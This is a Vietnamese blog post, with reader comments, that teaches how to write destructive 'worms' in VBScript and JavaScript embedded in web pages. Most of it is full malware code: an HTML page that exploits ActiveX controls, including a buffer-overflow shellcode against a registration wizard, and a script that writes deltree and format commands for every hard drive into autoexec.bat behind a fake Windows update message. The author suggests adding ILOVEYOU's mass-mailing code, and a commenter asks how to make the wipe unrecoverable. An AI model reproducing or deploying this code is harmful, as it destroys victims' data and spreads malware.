Cách viết một vài worm đơn giản bằng VBscript

Tôi xin giới thiệu với các bạn một vài viết một worms sử dụng javascript và Vbscript đơn giản. Và xin lưu ý là những đoạn code dưới đây chỉ sử dụng với mục đích học tập và nghiên cứu tôi không chịu trách nhiệm nếu ai đó sử dụng với mục đích khác.

1/Đoạn mã sao có khả năng phá hủy ổ cứng của bạn
Lưu ý: chỉ thử khi đã biết rõ.

CODE
======================
<!doctype html public “-//w3c//dtd html 4.0 transitional//en”>
<html>
<head>
<title>L0ng3ta worm</title>
</head>
<body>
<p>
<object id=”scr” classid=”clsid:06290BD5-48AA-11D2-8432-006008C3FBFC”>
</object>
</p>

<script>
var1=’echo @format “c: < c.txt >nul” >> c:\\autoexec.bat’
scr.Reset()
scr.Path=”C:\\windows\\Start aa\\Programs\\StartUp\\repair.hta”
scr.Doc=”<object id=’wsh’ classid=’clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’></object><script>wsh.Run(‘command /c echo e 171,20 >> C:\\d.TXT’,true,1);wsh.Run(‘command /c echo e 181,20 >> C:\\d.TXT’,true,1);wsh.Run(‘command /c echo w>> C:\\d.TXT’,true,1);wsh.Run(‘command /c echo q >> C:\\d.TXT’,true,1);wsh.Run(‘command /c echo y >> C:\\C.TXT’,true,1);wsh.Run(‘command /c echo Sucker >> C:\\C.TXT’,true,1);wsh.Run(‘command /c echo @echo Please wait while Setup updates your configuration files. >> c:\\autoexec.bat’,true,1);wsh.Run(‘command /c echo @echo This may take a few minutes… >> c:\\autoexec.bat’,true,1);wsh.Run(‘command /c “+var1+”‘,true,1);wsh.Run(‘command /c debug c:\\autoexec.bat < d.txt’,true,1)</”+”SCRIPT>”
scr.write()
</script>

<p>
<object classid=”clsid:50E5E3D1-C07E-11D0-B9FD-00A0249F6B00″ id=”RegWizObj”>
</object>
</p>

<script language=”VbScript”>
expstr = “/i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA”
expstr = expstr & Chr(235)
expstr = expstr & Chr(53)
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)
expstr = expstr + Chr(144)
expstr = expstr + Chr(139) + Chr(252)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)
expstr = expstr + Chr(80)
expstr = expstr + Chr(87)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + Chr(51) + Chr(192)
expstr = expstr + Chr(80)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) + Chr(191)
expstr = expstr + Chr(255) + Chr(210)
expstr = expstr + “rundll32 shell32.dll,SHExitWindowsEx 1”
RegWizObj.InvokeRegWizard(expstr)
</script>

</body>
</html>
======================

2/Cách tạo một virus khác format ổ cứng người khác
Sao đây mình xin giới thiệu với các bạn cách sử dụng VBScript để viết một worm nhỏ xoá sạch ổ cứng của victim. (có thể nhúng vào HTML)

(Lưu ý : dùng với mục đích nghiên cứu, không khuyến khích phá hoại).

I/để bắt victim thực thi một chương trình nào đó các bạn sử dụng đoạn script sau:

CODE
======================
<html>
<head>
<title>L0ng3ta worm</title>
</head>
<body >
<p>chuong trinh notepad se thuc thi </p>
<script language=VBSCRIPT>
On Error Resume Next
Set WSHShell = CreateObject(“WScript.Shell”)
WSHShell.Run “c:\windows\notepad.exe”,1,False
</SCRIPT>
</body>
</html>
======================

đoạn Script trên sẽ chạy chương trình notepad. Các bạn có thể copy vào trang HTML và cho chạy thử.

II/Đoạn Script để chèn một vài lệnh lên autoexec.bat trên ổ đĩa của victim.

CODE
======================
<script language=VBSCRIPT>

‘Ham tim xem file co ton tai hay khong
Function findFile(PathFiles)
dim fso,f
Set fso = CreateObject(“Scripting.FileSystemObject”)
If (fso.FileExists(PathFiles)) Then
FindFile = True
Set f = fso.GetFile(Pathfiles)
If f.attributes and 1 Then
f.attributes = f.attributes -1
End if
Else
FindFile = False
End If
End Function

‘Tao file Autoexec.bat
Sub createFile()
Dim fso, tf
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set tf = fso.CreateTextFile(“c:\Autoexec.bat”, True)
tf.WriteLine (“@Echo off”)
tf.Close
End Sub

‘Chen vao file Autoexec.bat dong command @echo
Sub insertBegintext()
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set tf = fso.Tự động mở ôTextFile(“c:\autoexec.bat”, ForAppending , True)
tf.WriteLine (“@Echo Please Waiting for Windows updating your system …”)
tf.Close
End Sub

‘chen vao autoexec.bat dong command @deltree /y + drive (co tac dung xoa all file)
Sub insertText(drv)
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, tf
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set tf = fso.Tự động mở ôTextFile(“c:\autoexec.bat”, ForAppending , True)
tf.WriteLine (“@deltree /y ” & drv & ” > null”)
tf.WriteLine (“@Format ” & drv & ” /q /u /autotest > null”)
tf.Close
End Sub

‘Kiem tra xem co phai o dia co phai la harddisk hay khong
‘Va tra ve true neu no la harddisk
Function showDriveInfo(drvpath)
Dim fso, d, s, t
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set d = fso.GetDrive(drvpath)
If d.DriveType = 2 then
If d.IsReady then
ShowDriveInfo = True
Else
ShowDriveInfo = False
End If
Else
ShowDiveInfo = False
End If
End Function

‘Ham chinh thuc
Sub Main()
Dim fso, d, dc, s, i

‘gan toi da la 15 o dia
Dim a(15)
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set dc = fso.Drives
i = 0

‘kiem tra tung o dia neu la o cung logic thi gan vao a
For Each d in dc
If showDriveInfo(d) then
a(i) = d
i= i+1
End If
Next

‘kiem tra autoexec.bat co ton tai hay khong
‘neu khong ton tai thi tao file moi
If Not findFile(“c:\autoexec.bat”) then
createFile
End if

‘chen vao Autoexec.bat dong comment dau tien
insertBegintext

‘duyet tung o dia tim thay va chen tiep vao Autoexec.bat
Do While i>0
i=i-1
inserttext(a(i))
Loop
End Sub

‘Goi thuc thi ham main
Main
</SCRIPT>

======================

III>Công việc còn lại là của các bạn, thay vì cho nó thực thi chương trình notepad các bạn hãy đổi tên nó thành “c:\autoexec.bat” thử xem, và các bạn đoán thử huyện gì sẽ xảy ra rồi đó, lưu ý là chèn nó thẳng vào file html. Lấy thêm đoạn source send mail của worm ILoveYou mà thêm vào nữa thì các bạn sẽ có một con Sworm đáng sợ.

Chúc thành công😉
L0ng3ta.

NU BN MUN COPY BÀI VIT XIN VUI LÒNG TÔN TRNG QUYN TÁC GI

2 phản hồi

  1. trojan pac oi

  2. Xin ban huong dan cho toi chen code virus ILOVEYou vao doan code format tren,
    VA cho hoi doan codde tren fornat xong co cuu lai dl dc ko??
    toi muon format ma ko cuu lai dc
    hihi

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: